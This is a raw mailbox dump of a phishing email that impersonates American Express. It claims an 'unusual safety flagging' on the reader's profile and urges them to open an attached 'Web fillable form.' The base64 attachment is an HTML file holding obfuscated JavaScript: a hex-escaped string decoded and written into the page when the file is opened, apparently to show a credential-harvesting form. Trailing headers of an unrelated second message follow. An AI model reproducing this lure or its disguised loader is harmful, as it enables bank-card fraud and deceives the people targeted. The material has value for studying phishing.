X-HMDNSGroup-MailScanner-From: americanexpress@hmdnsgroup.com
X-Spam-Status: No
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - bosch.hmdnsgroup.com
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - hmdnsgroup.com
X-Get-Message-Sender-Via: bosch.hmdnsgroup.com: mailgid no entry from get_recent_authed_mail_ips_entry
X-Authenticated-Sender: bosch.hmdnsgroup.com: 
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 91

This is a multi-part message in MIME format.

----=_Next_1A81_20161108_EC11.4.5.2391
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML><html>
<head>

    <META http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Dutf-8"><meta name=3D"viewport" content=3D"width=3Ddevice-width,=
 initial-scale=3D1.0, maximum-scale=3D1.0, user-scalable=3D0">

</head>
<body>
<table border=3D0 cellspacing=3D0 cellpadding=3D0 width=3D562 align=3Dcenter>
<tbody>
<tr>
<td bgcolor=3D#ececec rowspan=3D1 width=3D15 colspan=3D1>&nbsp;</td>
<td bgcolor=3D#ffffff rowspan=3D1 width=3D566 colspan=3D3>
<table cellspacing=3D0 cellpadding=3D0 width=3D"100%">
<tbody>
<tr>
<td style=3D"background-color: #ebebeb" rowspan=3D1 width=3D"100%" colspan=
=3D1>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px;=
 font-size: 6pt">&nbsp;</p>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #4d4f53; font-size: 14px" align=3Dcenter></p>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px;=
 font-size: 6pt">&nbsp;</p></td></tr></tbody></table>
<table cellspacing=3D0 cellpadding=3D0 width=3D"100%">
<tbody>
<tr>
<td rowspan=3D1 width=3D"3.49%" colspan=3D1>&nbsp;</td>
<td rowspan=3D1 width=3D"12.21%" colspan=3D1>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 black; font-size: 5pt">&nbsp;</p><img style=3D"border-bottom-style: none;=
 border-right-style: none; border-top-style: none; border-left-style: none"=
 src=3Dhttp://www208.americanexpress.com/axp/bu_logos/2008/bluebox.gif alt=
=3D"Microing   " height=3D"53.6" width=3D"51.2"></td>
<td rowspan=3D1 width=3D"3.68%" colspan=3D1>&nbsp;</td>
<td width=3D"30.62%" colspan=3D1>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 black; font-size: 5pt">&nbsp;</p>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #666666; font-size: 14px"><b>In regards, Primary Cardmember </b></p></td>
<td width=3D"32.75%" colspan=3D1>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 black; font-size: 5pt">&nbsp;</p>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #666666; font-size: 14px" align=3Dright>Profile ID&reg;</p>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #666666; font-size: 14px" align=3Dright>1009683</p></td>
<td rowspan=3D1 width=3D"3.88%" colspan=3D1>&nbsp;</td>
<td rowspan=3D1 width=3D"9.88%" colspan=3D1><img style=
=3D"border-bottom-style: none; border-right-style: none; border-top-style:=
 none; border-left-style: none" src=
=3Dhttp://www208.americanexpress.com/axp/cardart/2008/img_lock.gif alt=
=3D"Aveing   " width=3D"51.0" height=3D"34.1"></td>
<td rowspan=3D1 width=3D"3.49%" colspan=
=3D1>&nbsp;</td></tr></tbody></table><img style=3D"border-bottom-style: none;=
 border-right-style: none; border-top-style: none; border-left-style: none"=
 src=
=3Dhttp://www208.americanexpress.com/axp/cardart/2008/122812_AMEX_service_shdw=
1.jpg alt=3D"Dataing   " width=3D"526.8" height=3D"35.7"></td>
<td bgcolor=3D#ececec rowspan=3D1 width=3D15 colspan=3D1>&nbsp;</td></tr>
<tr>
<td bgcolor=3D#ececec rowspan=3D1 width=3D15 colspan=3D1>&nbsp;</td>
<td bgcolor=3D#ffffff rowspan=3D1 width=3D15 colspan=3D1>&nbsp;</td>
<td bgcolor=3D#ffffff rowspan=3D1 width=3D492 colspan=3D1>
<table cellspacing=3D0 cellpadding=3D0 width=3D"99.61%">
<tbody>
<tr>
<td style=3D"border-bottom: #009bbb 1pt solid; border-left: #009bbb 1pt=
 solid; background-color: #009bbb; width: 2.81%; border-top: #009bbb 1pt=
 solid; border-right: #009bbb 1pt solid"

rowspan=3D1 width=3D"2.14%" colspan=3D1>
<p>&nbsp;</p></td>
<td style=3D"border-bottom: #009bbb 1pt solid; background-color: #009bbb;=
 width: 18.42%; border-top: #009bbb 1pt solid; border-right: #009bbb 1pt=
 solid" rowspan=3D1 width=3D"39.3%">
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 black; font-size: 5pt">&nbsp;</p>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 white; font-size: 21.3px">&#10145;&#65039;</p>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 black; font-size: 5pt">&nbsp;</p></td>
<td style=3D"border-bottom: white 1pt solid; width: 5.78%; border-top: white=
 1pt solid; border-right: white 1pt solid" rowspan=3D4 width=3D"3.12%"=
 colspan=3D1>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #4d4f53; font-size: 14px">&nbsp;</p></td>
<td style=3D"border-bottom: white 1pt solid; width: 69.4%; border-collapse:=
 separate; vertical-align: top; border-top: white 1pt solid; border-right:=
 white 1pt solid" rowspan=3D3

width=3D"51.94%" colspan=3D1>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #4d4f53; font-size: 14px">&nbsp;</p>
<table style=3D"height: 130px" border=3D0 cellspacing=3D0 cellpadding=3D0=
 width=3D330 align=3Dcenter>
<tbody>
<tr>
<td style=3D"width: 326.19px" bgcolor=3D#ffffff>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #4d4f53; font-size: 13px">As part of our regular online platform monitoring=
 service.<br><br>Unfortunately, we are writing to let you know an unusual=
 safety flagging had occurred on your profile.<br><br>We urge cardmember to=
 follow through a re-confirmation of records with us as directed=
 below.</p></td></tr></tbody></table>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #4d4f53; font-size: 14px">&nbsp;</p>
<p style=3D"text-align: center; margin-top: 0px; font-family: arial;=
 margin-bottom: 0px; color: #4d4f53; font-size: 11pt"><span style=3D"color:=
 Navy"><b>INSTRUCTION</b></span></p>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #4d4f53; font-size: 11px">&nbsp;</p>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #4d4f53; font-size: 13px">Attached with this message is a Web fillable=
 form.</p>
<ul style=3D"list-style-type: circle">
<li style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 black; font-size: 10pt"><b>Take a moment to download and complete this form.=
 </b></li></ul>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #4d4f53; font-size: 13px">Thank you for your Card Membership.</p>
<br>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #4d4f53; font-size: 13px">American Express Online Team</p></td></tr>
<tr>
<td style=3D"border-bottom: #009bbb 1pt solid; border-left: #009bbb 1pt=
 solid; background-color: #009bbb; width: 2.81%; border-top: #009bbb 1pt=
 solid; border-right: #009bbb 1pt solid" width=3D"2.14%">&nbsp;</td>
<td style=3D"border-bottom: #009bbb 1pt solid; background-color: #009bbb;=
 width: 18.42%; border-top: #009bbb 1pt solid; border-right: #009bbb 1pt=
 solid" width=3D"39.3%">&nbsp;</td></tr>
<tr>
<td style=3D"border-bottom: gray 1pt solid; border-left: gray 1pt solid;=
 width: 2.81%; border-collapse: separate; vertical-align: top; border-top:=
 #009bbb 1pt solid; border-right: white 0pt solid" rowspan=3D1 width=
=3D"2.14%" colspan=3D1>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #4d4f53; font-size: 13.3px">&nbsp;</p></td>
<td style=3D"border-bottom: gray 1pt solid; width: 9.02%; border-collapse:=
 separate; vertical-align: top; border-top: #009bbb 1pt solid; border-right:=
 gray 1pt solid" rowspan=3D1 width=3D"29.77%" colspan=3D1>&nbsp;</td></tr>
<tr>
<td style=3D"border-bottom: white 1pt solid; border-left: white 1pt solid;=
 width: 21.24%; border-collapse: separate; vertical-align: top; border-top:=
 white 0.5pt solid; border-right: white 1pt solid" rowspan=3D1 width=
=3D"41.44%" colspan=3D2>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 black; font-size: 10pt">&nbsp;</p></td>
<td style=3D"border-bottom: white 1pt solid; width: 69.4%; border-collapse:=
 separate; vertical-align: top; border-top: white 1pt solid; border-right:=
 white 1pt solid" rowspan=3D1 width=3D"3.12%" colspan=3D1>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 black; font-size: 10pt">&nbsp;</p></td></tr></tbody></table></td>
<td bgcolor=3D#ffffff rowspan=3D1 width=3D15 colspan=3D1>&nbsp;</td>
<td bgcolor=3D#ececec rowspan=3D1 width=3D15 colspan=3D1>&nbsp;</td></tr>
<tr>
<td bgcolor=3D#ececec rowspan=3D1 width=3D15 colspan=3D1>&nbsp;</td>
<td bgcolor=3D#ececec rowspan=3D1 width=3D15 colspan=3D1>&nbsp;</td>
<td bgcolor=3D#ececec rowspan=3D1 width=3D492 colspan=3D1>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #666666; font-size: 10pt">&nbsp;</p>
<table cellspacing=3D0 cellpadding=3D0 width=3D"100%">
<tbody>
<tr>
<td rowspan=3D1 width=3D"49%" colspan=3D1>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #666666; font-size: 9pt" align=3Dcenter>Our Privacy Statement</p></td>
</tr></tbody></table>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #666666; font-size: 10pt">&nbsp;</p>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #666666; font-size: 9pt">Profile information is included above to help you=
 recognize this as a customer care message from American Express. </p>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #666666; font-size: 9pt">&nbsp;</p>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #666666; font-size: 9pt">&copy; 2019 American Express. All rights=
 reserved.</p>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #666666; font-size: 10.7px">&nbsp;</p>
<p style=3D"margin-top: 0px; font-family: arial; margin-bottom: 0px; color:=
 #666666; font-size: 10.7px"></p></td>
<td bgcolor=3D#ececec rowspan=3D1 width=3D15 colspan=3D1>&nbsp;</td>
<td bgcolor=3D#ececec rowspan=3D1 width=3D15 colspan=
=3D1>&nbsp;</td></tr></tbody></table>
<table border=3D0 cellspacing=3D0 cellpadding=3D0>
<tbody>
<tr>
<td style=3D"min-width: 538px; line-height: 0px; font-size: 0px" height=3D1=
 rowspan=3D1 colspan=3D1></td></tr>
</tbody>
</table>
</body>
</html>

----=_Next_1A81_20161108_EC11.4.5.2391
Content-Type: application/octet-stream; name="FM1904-K910.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="FM1904-K910.html"

PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4KICA8aGVhZD4KICAgIDxtZXRhIGh0dHAtZXF1aXY9
ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBpc28tODg1OS0xIi8+ICA8c2Ny
aXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+IHZhciBpLHQ9J1x4MzNceDYzXHgzNVx4MzJc
eDMxXHgzOFx4MzRceDM0XHgzNlx4MzRceDY2XHgzM1x4MzRceDMzXHgzOFx4MzVceDM0XHgz
MFx4MzVceDM5XHgzMVx4MzVceDMwXHgzMVx4MzRceDM1XHgzNFx4MzJceDMwXHgzNVx4MzZc
eDM4XHgzMlx4MzdceDM0XHgzNFx4MzZceDY0XHgzNVx4MzZceDYzXHgzM1x4MzNceDY1XHgz
NFx4MzBceDY0XHgzMlx4MzBceDYxXHgzOFx4MzNceDYzXHgzMlx4MzZceDM4XHgzNlx4Mzdc
eDM0XHgzNVx4MzZceDY0XHgzN1x4MzZceDYzXHgzOVx4MzNceDY1XHgzMVx4MzBceDY0XHgz
OFx4MzBceDYxXHgzMFx4MzJceDMwXHgzNFx4MzJceDMwXHgzNVx4MzNceDYzXHgzN1x4MzZc
eDM4XHgzNVx4MzZceDM1XHgzOVx4MzZceDMxXHgzN1x4MzZceDM0XHgzMFx4MzNceDY1XHgz
OFx4MzBceDY0XHgzNFx4MzBceDYxXHgzM1x4MzJceDMwXHgzNlx4MzJceDMwXHgzNVx4MzJc
eDMwXHgzNVx4MzJceDMwXHgzOFx4MzNceDYzXHgzOVx4MzZceDY0XHgzMFx4MzZceDM1XHgz
MVx4MzdceDM0XHgzNFx4MzZceDMxXHgzNVx4MzJceDMwXHgzNFx4MzZceDM4XHgzOFx4Mzdc
eDM0XHgzN1x4MzdceDM0XHgzMlx4MzdceDMwXHgzMVx4MzJceDY0XHgzNFx4MzZceDM1XHgz
OFx4MzdceDMxXHgzOVx4MzdceDM1XHgzNFx4MzZceDM5XHgzMFx4MzdceDM2XHgzN1x4MzNc
eDY0XHgzNFx4MzJceDMyXHgzNFx4MzZceDMzXHgzM1x4MzZceDY2XHgzMlx4MzZceDY1XHgz
MFx4MzdceDM0XHgzMlx4MzZceDM1XHgzMFx4MzZceDY1XHgzMFx4MzdceDM0XHgzMVx4MzJc
eDY0XHgzNVx4MzdceDM0XHgzNFx4MzdceDM5XHgzN1x4MzdceDMwXHgzMFx4MzZceDM1XHgz
OVx4MzJceDMyXHgzNVx4MzJceDMwXHgzOVx4MzZceDMzXHgzMFx4MzZceDY2XHgzN1x4MzZc
eDY1XHgzM1x4MzdceDM0XHgzNVx4MzZceDM1XHgzMVx4MzZceDY1XHgzMlx4MzdceDM0XHgz
M1x4MzNceDY0XHgzM1x4MzJceDMyXHgzNFx4MzdceDM0XHgzN1x4MzZceDM1XHgzMlx4Mzdc
eDM4XHgzM1x4MzdceDM0XHgzMVx4MzJceDY2XHgzMlx4MzZceDM4XHgzMVx4MzdceDM0XHgz
Nlx4MzZceDY0XHgzN1x4MzZceDYzXHgzNFx4MzNceDYyXHgzOVx4MzJceDMwXHgzN1x4MzVc
eDM1XHgzN1x4MzVceDM0XHgzMFx4MzRceDM2XHgzOFx4MzJceDY0XHgzOFx4MzNceDM4XHgz
NVx4MzJceDMyXHgzM1x4MzJceDY2XHgzNlx4MzNceDY1XHgzNlx4MzJceDMwXHgzM1x4MzJc
eDMwXHgzMVx4MzNceDYzXHgzNVx4MzdceDMzXHgzM1x4MzZceDMzXHgzOFx4MzdceDMyXHgz
OVx4MzZceDM5XHgzOVx4MzdceDMwXHgzMFx4MzdceDM0XHgzMlx4MzJceDMwXHgzM1x4Mzdc
eDM0XHgzNFx4MzdceDM5XHgzNlx4MzdceDMwXHgzMVx4MzZceDM1XHgzNlx4MzNceDY0XHgz
MFx4MzJceDMyXHgzM1x4MzdceDM0XHgzOVx4MzZceDM1XHgzMlx4MzdceDM4XHgzOVx4Mzdc
eDM0XHgzNlx4MzJceDY2XHgzNlx4MzZceDYxXHgzOVx4MzZceDMxXHgzNFx4MzdceDM2XHgz
NFx4MzZceDMxXHgzOVx4MzdceDMzXHgzMlx4MzZceDMzXHgzMlx4MzdceDMyXHgzNFx4MzZc
eDM5XHgzNlx4MzdceDMwXHgzOFx4MzdceDM0XHgzMFx4MzJceDMyXHgzOVx4MzJceDMwXHgz
MFx4MzdceDMzXHgzNlx4MzdceDMyXHgzM1x4MzZceDMzXHgzOVx4MzNceDY0XHgzNlx4MzJc
eDMyXHgzMlx4MzZceDM4XHgzOVx4MzdceDM0XHgzOVx4MzdceDM0XHgzNlx4MzdceDMwXHgz
NFx4MzdceDMzXHgzNlx4MzNceDYxXHgzN1x4MzJceDY2XHgzMFx4MzJceDY2XHgzNlx4Mzdc
eDM3XHgzMFx4MzdceDM3XHgzMFx4MzdceDM3XHgzOFx4MzJceDY1XHgzMFx4MzdceDM2XHgz
Nlx4MzZceDM1XHgzNVx4MzdceDM0XHgzOVx4MzZceDY2XHgzMVx4MzZceDY1XHgzOVx4MzZc
eDMzXHgzOFx4MzZceDY2XHgzNFx4MzZceDYzXHgzMlx4MzZceDY2XHgzM1x4MzZceDM3XHgz
MFx4MzZceDM5XHgzMVx4MzdceDMzXHgzM1x4MzdceDM0XHgzMFx4MzJceDY1XHgzMVx4MzZc
eDMzXHgzMFx4MzZceDY2XHgzM1x4MzZceDY0XHgzMVx4MzJceDY2XHgzN1x4MzZceDM5XHgz
Nlx4MzZceDY0XHgzMVx4MzZceDM3XHgzNlx4MzdceDMzXHgzMlx4MzJceDY2XHgzNVx4MzZc
eDM0XHgzMlx4MzZceDM1XHgzMFx4MzZceDY0XHgzNlx4MzZceDY2XHgzOVx4MzJceDY1XHgz
MFx4MzZceDYxXHgzNlx4MzdceDMzXHgzN1x4MzJceDMyXHgzMFx4MzNceDY1XHgzM1x4MzNc
eDYzXHgzM1x4MzJceDY2XHgzOVx4MzdceDMzXHgzNFx4MzZceDMzXHgzMlx4MzdceDMyXHgz
OFx4MzZceDM5XHgzOVx4MzdceDMwXHgzNFx4MzdceDM0XHgzMVx4MzNceDY1XHgzOVx4MzJc
eDMwXHgzNVx4MzNceDYzXHgzNVx4MzJceDY2XHgzMFx4MzdceDMzXHgzN1x4MzZceDMzXHgz
NVx4MzdceDMyXHgzNFx4MzZceDM5XHgzOFx4MzdceDMwXHgzM1x4MzdceDM0XHgzMFx4MzNc
eDY1XHgzMFx4MzBceDY0XHgzMFx4MzBceDYxXHgzM1x4MzJceDMwXHgzNVx4MzJceDMwXHgz
Mlx4MzNceDYzXHgzNFx4MzJceDY2XHgzMVx4MzZceDM4XHgzMVx4MzZceDM1XHgzNFx4MzZc
eDMxXHgzOFx4MzZceDM0XHgzOVx4MzNceDY1XHgzNVx4MzBceDY0XHgzMVx4MzBceDYxXHgz
Mlx4MzJceDMwXHgzNVx4MzJceDMwXHgzNlx4MzNceDYzXHgzNVx4MzZceDMyXHgzM1x4MzZc
eDY2XHgzNVx4MzZceDM0XHgzMFx4MzdceDM5XHgzNFx4MzNceDY1XHgzNVx4MzBceDY0XHgz
Nlx4MzBceDYxXHgzMFx4MzJceDMwXHgzNlx4MzJceDMwXHgzM1x4MzNceDYzXHgzNVx4MzJc
eDY2XHgzMFx4MzZceDMyXHgzMlx4MzZceDY2XHgzOVx4MzZceDM0XHgzMVx4MzdceDM5XHgz
Mlx4MzNceDY1XHgzOVx4MzBceDY0XHgzNVx4MzBceDYxXHgzOFx4MzNceDYzXHgzMlx4MzJc
eDY2XHgzOVx4MzZceDM4XHgzOVx4MzdceDM0XHgzNFx4MzZceDY0XHgzM1x4MzZceDYzXHgz
OFx4MzNceDY1XHgzMycseD0nJztmb3IoaT0weDA7aTx0WydceDZjXHg2NVx4NmVceDY3XHg3
NFx4NjgnXTtpKz0weDMpe3grPXVuZXNjYXBlKCdceDI1Jyt0WydceDczXHg3NVx4NjJceDcz
XHg3NFx4NzInXShpLDB4MikpO31kb2N1bWVudFsnXHg3N1x4NzJceDY5XHg3NFx4NjUnXSh4
KTs8L3NjcmlwdD4gIDwvaGVhZD4KICA8Ym9keT4KICA8L2JvZHk+CjwvaHRtbD4=

----=_Next_1A81_20161108_EC11.4.5.2391--


From jose@monkey.org Sat Apr 20 04:16:18 2019 +0000
Return-Path: bounces+10108551-7330-jose=monkey.org@sendgrid.net
Delivered-To: jose@monkey.org
X-FDA: 75398780436.23.boot90_7141e0316380f
X-Spam-Summary: 1,0,0,,d41d8cd98f00b204,bounces+10108551-7330-jose=monkey.org@sendgrid.net,:,RULES_HIT:30001:30016:30051:30054:30055:30066:30069:30070,0,RBL:149.72.189.184:@sendgrid.net:.lbl8.mailshell.net-62.18.0.100 64.10.201.10,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neutral,Custom_rules:0:1:0,LFtime:25,LUA_SUMMARY:none
X-HE-Tag: boot90_7141e0316380f
X-Filterd-Recvd-Size: 10065
Received: from wrqvbdbv.outbound-mail.sendgrid.net (wrqvbdbv.outbound-mail.sendgrid.net [149.72.189.184])
	by imf30.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sat, 20 Apr 2019 04:16:18 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; d=sendgrid.net; 
	h=mime-version:from:to:subject:content-type:content-transfer-encoding; 
	s=smtpapi; bh=13BfWh/OiqUPmGxJ1Rj6tDbjQjs=; b=JZtbtk6NyPGyPvtDYH
	cuWI1SEKauYsgbnmTmx7zJFULJjbQtEQTAlMsAB5Jv10vCzR9QaJuF21fNYl/Rmh
	RlV2O0DvKEGIL3oOeSUBOVa5g5jpwKXiEe5AqMMSfvQKCBrBQwrpWwKEiGiX68qt
	kmzYufwdCLgQ+9Pzt1rUqGb0A=
Received: by filter0090p3iad2.sendgrid.net with SMTP id filter0090p3iad2-26610-5CBA9D10-F
        2019-04-20 04:16:16.41021833 +0000 UTC m=+382411.131025063
Received: from DESKTOP-F2MQ3DM (unknown [196.179.183.89])
	by ismtpd0002p1lon1.sendgrid.net (SG) with ESMTP id ZtkgoYMKRuGMbfcUrmTB_w
	for <jose@monkey.org>; Sat, 20 Apr 2019 04:16:16.119 +0000 (UTC)
MIME-Version: 1.0
